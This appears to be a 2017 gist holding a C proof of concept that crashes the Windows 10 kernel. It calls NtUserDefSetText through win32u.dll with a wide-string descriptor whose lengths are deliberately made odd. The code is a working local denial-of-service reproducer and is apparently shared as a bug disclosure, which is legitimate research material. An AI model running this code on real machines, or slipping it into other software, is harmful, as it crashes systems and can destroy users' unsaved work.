Created
November 8, 2017 17:16
NtUserDefSetText() in Windows 10 will panic if you set the ansi flag incorrectly.
#include <windows.h> | |
#include <winternl.h> | |
#include <stdio.h> | |
#pragma comment(lib, "user32") | |
#pragma comment(lib, "gdi32") | |
/*
 * Counted-string descriptor passed to NtUserDefSetText() in this reproducer.
 * The definition is local to this file; it is not taken from a public SDK
 * header. bAnsi selects how Buffer is interpreted: FALSE means WCHAR data,
 * in which case Length is expected to be a whole number of WCHARs.
 */
struct _LARGE_STRING {
    ULONG Length;            /* length of the data in Buffer (set via sizeof below, i.e. bytes) */
    ULONG MaximumLength:31;  /* capacity of Buffer; 31-bit field declared next to bAnsi */
    ULONG bAnsi:1;           /* non-zero: Buffer holds CHARs; zero: Buffer holds WCHARs */
    PVOID Buffer;            /* caller-owned storage described by the two lengths */
};
typedef struct _LARGE_STRING LARGE_STRING;
typedef struct _LARGE_STRING *PLARGE_STRING;
/* 32-byte backing buffer for the window text; the unused tail is zero-filled. */
static CHAR kWindowText[32] = { "Hello World" };
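/*
 * Reproducer for the condition named in the gist description: NtUserDefSetText()
 * is given a LARGE_STRING that claims to be a wide string (bAnsi == FALSE) but
 * whose lengths are odd, which cannot describe a whole number of WCHARs.
 * According to the description, Windows 10 panics on this input instead of
 * rejecting it.
 *
 * Every setup step is checked so that a missing export or a failed window
 * creation is reported on stderr instead of turning into a call through a
 * NULL pointer or a call with a NULL window handle.
 *
 * Returns 1 on every path, as the original did.
 */
int main(int argc, char **argv) {
    HMODULE Win32u;
    FARPROC NtUserDefSetText;
    WNDCLASSEX WindowClass = {0};
    HWND Window;
    LARGE_STRING DefText = {
        .Length = sizeof kWindowText,
        .MaximumLength = sizeof kWindowText,
        .bAnsi = FALSE,
        .Buffer = kWindowText,
    };

    (void)argc;
    (void)argv;

    /* The export is resolved at run time; it may be absent on other builds. */
    Win32u = LoadLibrary("WIN32U");
    if (Win32u == NULL) {
        fprintf(stderr, "LoadLibrary(WIN32U) failed: %lu\n", (unsigned long)GetLastError());
        return 1;
    }

    NtUserDefSetText = GetProcAddress(Win32u, "NtUserDefSetText");
    if (NtUserDefSetText == NULL) {
        fprintf(stderr, "NtUserDefSetText not exported: %lu\n", (unsigned long)GetLastError());
        return 1;
    }

    // bAnsi is FALSE, so the lengths should be a whole number of WCHARs and
    // therefore even. Setting the low bit makes both odd (32 | 1 == 33), which
    // also makes the declared length one byte larger than kWindowText.
    DefText.MaximumLength |= 1;
    DefText.Length |= 1;

    WindowClass.cbSize = sizeof(WNDCLASSEX);
    WindowClass.lpfnWndProc = DefWindowProc;
    WindowClass.hInstance = GetModuleHandle(NULL);
    WindowClass.lpszClassName = "Class";

    if (RegisterClassEx(&WindowClass) == 0) {
        fprintf(stderr, "RegisterClassEx failed: %lu\n", (unsigned long)GetLastError());
        return 1;
    }

    Window = CreateWindowEx(0, "Class", "Window", 0, CW_USEDEFAULT, 0, 128, 128, NULL, NULL, GetModuleHandle(NULL), NULL);
    if (Window == NULL) {
        fprintf(stderr, "CreateWindowEx failed: %lu\n", (unsigned long)GetLastError());
        return 1;
    }

    NtUserDefSetText(Window, &DefText);

    /* Reaching this line means the call returned, i.e. this build did not panic. */
    fprintf(stderr, "NtUserDefSetText returned\n");

    return 1;
}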